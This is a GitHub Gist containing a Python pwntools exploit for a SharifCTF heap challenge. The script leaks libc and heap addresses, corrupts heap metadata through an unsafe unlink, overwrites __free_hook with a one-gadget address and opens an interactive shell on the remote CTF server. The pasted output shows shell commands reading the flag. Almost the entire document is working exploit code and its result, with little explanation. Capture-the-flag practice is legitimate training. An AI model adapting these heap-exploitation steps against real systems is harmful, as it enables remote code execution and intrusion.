Last active
February 4, 2018 01:27
-
-
Save soez/bbc990453f35c080cef8cc5f345f9f4e to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| local = False | |
| r = process("./t00p_secrets") if local else remote('ctf.sharif.edu', 22107) | |
| r.recvuntil("Enter your master key: ") | |
| r.sendline(p64(4283034714650536567L) + p64(8243946171696569202L) + p64(7454134929210039143L)) | |
| def menu(n): | |
| r.recvuntil("> ") | |
| r.sendline(str(n)) | |
| def create(idx, sz, n, string): | |
| menu(1) | |
| r.recvuntil("Enter secret idx: ") | |
| r.sendline(str(idx)) | |
| r.recvuntil("Enter secret body size: ") | |
| r.sendline(str(sz)) | |
| r.recvuntil("binary(0) or String(1): ") | |
| r.sendline(str(n)) | |
| r.recvuntil("Please enter secret body (MAX " + str(sz) + "): ") | |
| r.sendline(string) | |
| def delete(idx): | |
| menu(2) | |
| r.recvuntil("Please enter secret id to delete: ") | |
| r.sendline(str(idx)) | |
| def edit(idx, n, string): | |
| menu(3) | |
| r.recvuntil("Please enter secret id to edit: ") | |
| r.sendline(str(idx)) | |
| r.recvuntil("binary(0) or String(1): ") | |
| r.sendline(str(n)) | |
| r.recvuntil("Please enter secret content: ") | |
| r.sendline(string) | |
| def view_(): | |
| menu(4) | |
| r.recvuntil("\n-----***-----") | |
| def view(idx): | |
| menu(5) | |
| r.recvuntil("Please enter secret id to print: ") | |
| r.sendline(str(idx)) | |
| r.recvuntil("content: ") | |
| libc = u64(r.recv(6).ljust(8, '\0')) | |
| r.recv(2) | |
| heap = u64(r.recv(4).ljust(8, '\0')) | |
| return libc, heap | |
| def new(master): | |
| menu(7) | |
| print r.recvuntil("Enter your master key: ") | |
| r.sendline(master) | |
| create(0, 256, 0, "") | |
| create(1, 256, 0, "") | |
| create(2, 256, 0, "") | |
| create(3, 256, 0, "") | |
| delete(0) | |
| delete(2) | |
| create(0, 256, 0, "") | |
| leak1, leak2 = view(0) | |
| libc_base = leak1 - 0x3c4b0a | |
| heap = leak2 - 0x1230 + 0x1020 # start our chunks | |
| delete(0) | |
| delete(1) | |
| delete(3) | |
| print "[+] libc_base: 0x%x" % libc_base | |
| print "[+] heap: 0x%x" % heap | |
| create(0, 0x2f8, 0, "") | |
| create(1, 0x2f8, 0, "") | |
| edit(0, 1, p64(0) + p64(0x2f1) + p64(0x6020a0) + p64(0x6020a8) + "\x00"*0x2d0 + p64(0x2f0)) # unsafe unlink | |
| delete(1) | |
| free_hook = libc_base + 0x3c67a8 | |
| magic_gadget = libc_base + 0x4526a | |
| print "[+] free_hook: 0x%x" % free_hook | |
| print "[+] magic_gadget: 0x%x" % magic_gadget | |
| edit(0, 0, p64(4283034714650536567L) + p64(8243946171696569202L) + p64(7454134929210039143L) + p64(free_hook)) | |
| edit(0, 0, p64(magic_gadget)) | |
| delete(0) | |
| r.interactive() | |
| ''' | |
| [+] libc_base: 0x7f394d8ed000 | |
| [+] heap: 0xed0020 | |
| [+] free_hook: 0x7f394dcb37a8 | |
| [+] magic_gadget: 0x7f394d93226a | |
| [*] Switching to interactive mode | |
| $ id | |
| uid=1001(suctf) gid=1001(suctf) groups=1001(suctf) | |
| $ cat /home/suctf/flag | |
| SharifCTF{R34V1L1NG_S3CR3T5_VI4_51NGL3_NULL_BY73} | |
| ''' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment